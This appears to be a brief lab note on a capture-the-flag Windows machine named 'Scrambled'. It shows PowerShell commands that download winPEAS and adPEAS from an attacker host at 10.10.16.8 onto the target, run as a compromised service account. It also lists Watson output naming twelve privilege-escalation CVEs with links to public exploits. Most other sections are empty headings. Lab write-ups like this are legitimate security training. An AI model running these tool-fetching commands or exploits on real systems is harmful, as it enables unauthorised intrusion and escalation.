InfoSec LAB

Scrambled_Automated

Created: 1 min read

PEAS

ps c:\Temp> iwr http://10.10.16.8/winPEASx64.exe -Outfile C:\Temp\winPEASx64.exe

Delivery complete

Executing PEAS as the sqlsvc account due to the higher privileges available

CVEs

  [?] Windows vulns search powered by Watson(https://github.com/rasta-mouse/Watson)
 [*] OS Version: 1809 (17763)
 [*] Enumerating installed KBs...
 [!] CVE-2019-0836 : VULNERABLE
  [>] https://exploit-db.com/exploits/46718
  [>] https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/
 
 [!] CVE-2019-0841 : VULNERABLE
  [>] https://github.com/rogue-kdc/CVE-2019-0841
  [>] https://rastamouse.me/tags/cve-2019-0841/
 
 [!] CVE-2019-1064 : VULNERABLE
  [>] https://www.rythmstick.net/posts/cve-2019-1064/
 
 [!] CVE-2019-1130 : VULNERABLE
  [>] https://github.com/S3cur3Th1sSh1t/SharpByeBear
 
 [!] CVE-2019-1253 : VULNERABLE
  [>] https://github.com/padovah4ck/CVE-2019-1253
  [>] https://github.com/sgabe/CVE-2019-1253
 
 [!] CVE-2019-1315 : VULNERABLE
  [>] https://offsec.almond.consulting/windows-error-reporting-arbitrary-file-move-eop.html
 
 [!] CVE-2019-1385 : VULNERABLE
  [>] https://www.youtube.com/watch?v=K6gHnr-VkAg
 
 [!] CVE-2019-1388 : VULNERABLE
  [>] https://github.com/jas502n/CVE-2019-1388
 
 [!] CVE-2019-1405 : VULNERABLE
  [>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/
  [>] https://github.com/apt69/COMahawk
 
 [!] CVE-2020-0668 : VULNERABLE
  [>] https://github.com/itm4n/SysTracingPoc
 
 [!] CVE-2020-0683 : VULNERABLE
  [>] https://github.com/padovah4ck/CVE-2020-0683
  [>] https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/cve-2020-0683.ps1
 
 [!] CVE-2020-1013 : VULNERABLE
  [>] https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/
 
 [*] Finished. Found 12 potential vulnerabilities.

LAPS

LSA Protection

Credentials Guard

Cached Creds

AV

UAC

KrbRelayUp

NTLM

AppLocker

.NET

Logged Users

MSSQL

Installed Programs

Modifiable Services

RmSvc

adPEAS

ps c:\Temp> iwr http://10.10.16.8/adPEAS.ps1 -Outfile C:\Temp\adPEAS.ps1

Delivery complete

Executing adPEAS as the sqlsvc account due to the higher privileges available

Domain

ms-DS-MachineAccountQuota

ADCS

EFS

WebServer

Machine

User

SubCA

Kerberoasting

SharpHound

Interactive Graph View

Backlinks